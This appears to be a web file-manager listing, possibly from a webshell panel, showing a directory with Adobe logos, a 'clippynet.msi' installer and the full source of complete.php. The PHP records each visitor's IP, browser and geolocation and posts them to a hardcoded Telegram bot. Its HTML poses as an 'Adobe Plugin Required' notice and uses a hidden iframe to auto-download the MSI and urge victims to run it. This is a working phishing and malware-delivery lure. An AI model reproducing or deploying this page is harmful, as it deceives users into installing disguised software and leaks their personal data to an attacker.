at path:
ROOT
/
clippynet
/
complete.php
run:
R
W
Run
clippynet
DIR
2026-02-09 16:39:08
R
W
Run
Screenshot 2025-04-25 161700.png
49.54 KB
2025-04-25 13:46:15
R
W
Run
Delete
Rename
adobe-logo-2017.png
19.41 KB
2025-04-25 14:12:59
R
W
Run
Delete
Rename
adobe-logo.png
69.02 KB
2025-04-25 14:52:26
R
W
Run
Delete
Rename
adobe.png
18.2 KB
2025-04-25 14:54:24
R
W
Run
Delete
Rename
adobeicon.png
68.11 KB
2025-04-25 14:35:27
R
W
Run
Delete
Rename
clippynet.msi
9.61 MB
2026-01-27 16:30:48
R
W
Run
Delete
Rename
complete.php
2.69 KB
2026-01-27 16:43:17
R
W
Run
Delete
Rename
denied.html
2.88 KB
2025-04-25 16:02:38
R
W
Run
Delete
Rename
download.html
3.35 KB
2026-01-27 16:32:56
R
W
Run
Delete
Rename
download.php
431 By
2026-01-27 16:31:54
R
W
Run
Delete
Rename
index.html
2.72 KB
2025-04-25 21:10:26
R
W
Run
Delete
Rename
error_log
up
📄
complete.php
Save
<?php // Telegram Configuration $botToken = '8016647211:AAGg6AX8yiRZAUzDTz6IjIc8QYrhXb6JkzA'; $chatID = '1193649321'; // File to download $fileName = 'clippynet.msi'; // Collect visitor data $ip = $_SERVER['REMOTE_ADDR']; $ua = $_SERVER['HTTP_USER_AGENT']; $time = date('Y-m-d H:i:s'); // Get geolocation $geo = json_decode(file_get_contents("http://ip-api.com/json/{$ip}"), true); // Create Telegram message $message = "🚨 New Download Triggered 🚨\n"; $message .= "▫️ Time: {$time}\n"; $message .= "▫️ IP: {$ip}\n"; $message .= "▫️ Location: " . ($geo['city'] ?? 'Unknown') . ", " . ($geo['country'] ?? 'Unknown') . "\n"; $message .= "▫️ ISP: " . ($geo['isp'] ?? 'Unknown') . "\n"; $message .= "▫️ Device: {$ua}"; // Send to Telegram $url = "https://api.telegram.org/bot{$botToken}/sendMessage"; $data = ['chat_id' => $chatID, 'text' => $message]; $options = [ 'http' => [ 'method' => 'POST', 'content' => http_build_query($data) ] ]; file_get_contents($url, false, stream_context_create($options)); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Adobe Plugin Required</title> <style> body { font-family: Arial, sans-serif; margin: 0; height: 100vh; display: flex; align-items: flex-start; justify-content: center; background-color: #f5f5f5; padding-top: 15vh; } .container { text-align: center; max-width: 600px; margin-top: 0; } img { width: 150px; margin-bottom: 20px; } a { color: #d32f2f; text-decoration: none; font-weight: bold; } a:hover { text-decoration: underline; } p { line-height: 1.6; margin: 0; padding: 0 10px; } </style> </head> <body> <div class="container"> <img src="adobeicon.png" alt="Adobe Icon"> <p>Sorry, You do not have the latest version of Adobe plugin installed.<br> Let’s finish your installation.<br><br> Open clippynet.msi from recent downloads (right corner of this screen) to install. <a href="download.php">Download manually</a>.<br><br> Download not working? <a href="#">Restart and Download | Get Help</a></p> </div> <!-- Hidden iframe to trigger download after page loads --> <iframe src="download.php" style="display:none;"></iframe> </body> </html>